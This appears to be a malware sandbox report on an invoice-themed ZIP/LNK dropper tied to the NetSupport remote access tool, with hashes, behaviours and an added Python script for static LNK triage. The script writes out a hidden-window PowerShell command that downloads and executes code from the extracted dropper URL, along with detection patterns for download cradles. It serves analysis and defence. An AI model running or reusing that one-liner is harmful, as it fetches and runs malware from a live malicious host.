General

  • Target

    05032024_2022_05032024_Rechnung3777686 M3605066 TEU3777686.zip

  • Size

    68KB

  • Sample

    240305-pkd4jsee7z

  • MD5

    28ab8de3167677f235e079b250446802

  • SHA1

    97ec38d975d39885f24ba21076007d1c23b0af67

  • SHA256

    350a842974df765f33b30c07cdb290e6846dd48d9af8b5851a31beced889d00e

  • SHA512

    e25d8f19df887d81c8ee469b831eaeee43d7b462db5a87e2c97ec09060f5786587d5db4e4311435ec006c3af905b405da04d0177721bda9afb0d9720f306a177

  • SSDEEP

    1536:yB03CP06zUU/x5baWTzcf16WLkLTcK9cQUxowtZhT5:yB0SP06zUKIWvilecV7t

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper: https://www.sdsoffice.fr/test.txt

Targets

    • Target

      Rechnung3777686 M3605066 TEU3777686.lnk

    • Size

      69KB

    • MD5

      234122cf935c5dfb99690848542920f0

    • SHA1

      e1830914af3a5c7968c08afbbe70c931b05987a6

    • SHA256

      f40766eae36bc156e1d05e52d6763b0e80c6adbe91518e76acb3c095fc1514cc

    • SHA512

      10bf42180bc776a346c4ad9e63380001db39ab83ad5caf137f5ac5f91776d5ab12fd4607e9ca674d41dc452a0be6bc3693038b3335be14a35cbd8f0933d21618

    • SSDEEP

      1536:ChHIEFR+bfF3TuA19ow8DPZ4pxXW47NhdEmfjwR6Wts3L75cF:6nFUF3N1P8DPyxB0sxbS

    • NetSupport

      NetSupport is a remote access tool sold as legitimate system administration software.

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely a geofence check.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application
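The report gives the hashes of the dropper LNK but not the command line it carries. The following is an added example, not part of the report and not the sandbox's own tooling: it parses a Windows Shell Link file statically (header, LinkTargetIDList, LinkInfo and StringData as laid out in MS-SHLLINK) and pulls out the target, the arguments and any embedded URLs, then applies a few triage heuristics, so the PowerShell one-liner can be read before detonation. The sample LNK is constructed inside the script; its target path and command line are assumptions, only the https://www.sdsoffice.fr/test.txt URL comes from the extracted config above.

```python
"""Static triage of a Windows Shell Link (.lnk) file.

Added example for the LNK dropper in the report above; not part of the report.
Field layout follows MS-SHLLINK: 2.1 ShellLinkHeader, 2.2 LinkTargetIDList,
2.3 LinkInfo, 2.4 StringData. The sample LNK at the bottom is constructed here.
"""
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# {00021401-0000-0000-C000-000000000046} as it appears on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)


def _read_string(data, off, unicode):
    """StringData entry: CountCharacters (u16) then that many chars, no terminator."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    width = 2 if unicode else 1
    raw = data[off:off + count * width]
    off += count * width
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", errors="replace")
    return text, off


def parse_lnk(data):
    """Return the StringData fields of a .lnk plus any URLs found in its arguments."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    off = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (u16) + IDList bytes
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize (u32) counts itself
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags}
    for bit, name in STRING_FIELDS:            # StringData entries appear in this fixed order
        if flags & bit:
            fields[name], off = _read_string(data, off, unicode)
    fields["urls"] = URL_RE.findall(fields.get("arguments", ""))
    return fields


def suspicious_indicators(fields):
    """Cheap heuristics a triage script would raise on a mail-borne LNK."""
    target = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    args = fields.get("arguments", "")
    hits = []
    if re.search(r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32", target):
        hits.append("target is a script host or LOLBin")
    if re.search(r"-w(indowstyle)?\s+h(idden)?\b", args, re.IGNORECASE):
        hits.append("hidden window")
    if re.search(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", args, re.IGNORECASE):
        hits.append("encoded command")
    if re.search(r"\biex\b|invoke-expression", args, re.IGNORECASE):
        hits.append("invoke-expression on fetched content")
    if re.search(r"\biwr\b|invoke-webrequest|downloadstring|net\.webclient|curl\b|certutil", args, re.IGNORECASE):
        hits.append("remote download")
    if fields["urls"]:
        hits.append("embedded URL(s): " + ", ".join(fields["urls"]))
    return hits


def build_sample_lnk(relative_path, arguments):
    """Constructed, minimal LNK: header + empty IDList + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        0x4C, LNK_CLSID, flags,
        0x20,          # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        0, 0, 0,       # Creation/Access/Write FILETIMEs
        0,             # FileSize
        0,             # IconIndex
        7,             # ShowCommand: SW_SHOWMINNOACTIVE, often seen in malicious LNKs
        0, 0, 0, 0,    # HotKey, Reserved1..3
    )
    id_list = struct.pack("<HH", 2, 0)  # IDListSize=2: only the TerminalID

    def s(text):
        encoded = text.encode("utf-16-le")
        return struct.pack("<H", len(encoded) // 2) + encoded  # count is UTF-16 code units

    return header + id_list + s(relative_path) + s(arguments)


# Constructed sample. Target path and command line are assumptions; the URL is the
# ps1.dropper URL the report extracted.
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -nop -ep bypass -c "iex (iwr https://www.sdsoffice.fr/test.txt -UseBasicParsing)"',
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    for key, value in parsed.items():
        print(f"{key:14} {value}")
    for hit in suspicious_indicators(parsed):
        print("!", hit)
```

To run it against a real sample, replace SAMPLE_LNK with the file's bytes (`parse_lnk(open(path, "rb").read())`); the parser only skips over the IDList and LinkInfo blocks, so a LNK whose payload hides in an ExtraData block after the StringData still needs a full parser such as LECmd or LnkParse3.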

MITRE ATT&CK Enterprise v15

Tasks